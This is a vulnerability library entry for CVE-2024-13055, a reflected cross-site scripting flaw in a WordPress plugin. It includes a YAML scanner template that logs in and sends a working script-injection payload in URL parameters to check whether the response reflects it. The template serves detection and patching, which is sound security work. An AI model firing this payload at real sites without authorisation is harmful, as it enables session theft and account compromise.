/Vulnerability Library

Dyn Business Panel Plugin <= 1.0.0 - Cross-Site Scripting

CVE-2024-13055
Verified

Description

Dyn Business Panel WordPress plugin <= 1.0.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter in output, letting attackers execute scripts in the context of high privilege users, exploit requires victim to click a malicious link.

Severity

High

CVSS Score

7.1

Exploit Probability

2%

Affected Product

dyn_business_panel

Published Date

February 6, 2026

Template Author

sourabh-sahu

CVE-2024-13055.yaml
id: CVE-2024-13055

info:
  name: Dyn Business Panel Plugin <= 1.0.0 - Cross-Site Scripting
  author: Sourabh-Sahu
  severity: high
  description: |
    Dyn Business Panel WordPress plugin <= 1.0.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter in output, letting attackers execute scripts in the context of high privilege users, exploit requires victim to click a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to account compromise or data theft.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/91178272-ed7e-412c-a187-e360a1313004/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13055
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13055
    cwe-id: CWE-79
    epss-score: 0.02205
    epss-percentile: 0.84638
    cpe: cpe:2.3:a:phycticio:dyn_business_panel:1.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: phycticio
    product: dyn_business_panel
  tags: cve,cve2024,dyn-business-panel,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=dbp_clients&edit=$dbp_client_id"></script><script>alert(document.domain)</script><script>&Submit=testxss"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - contains_all(body, "></script><script>alert(document.domain)</script><script>", "Clientes")
          - contains(content_type, "text/html")
          - status_code == 200
        condition: and
# digest: 4a0a0047304502200621db13e9c5a29816a2dfd79baf63ef78e6fef1dc693d238a46c414c9d5b85a022100f4072f158f2ffc3baa30292fcc9f30be7c5a84e97593f6b6047025fcdfba2ce3:922c64590222798bb761d5b6d8e72950
7.1Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
CVE ID:
cve-2024-13055
CWE ID:
cwe-79

References

https://wpscan.com/vulnerability/91178272-ed7e-412c-a187-e360a1313004/https://nvd.nist.gov/vuln/detail/CVE-2024-13055

Remediation Steps

Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.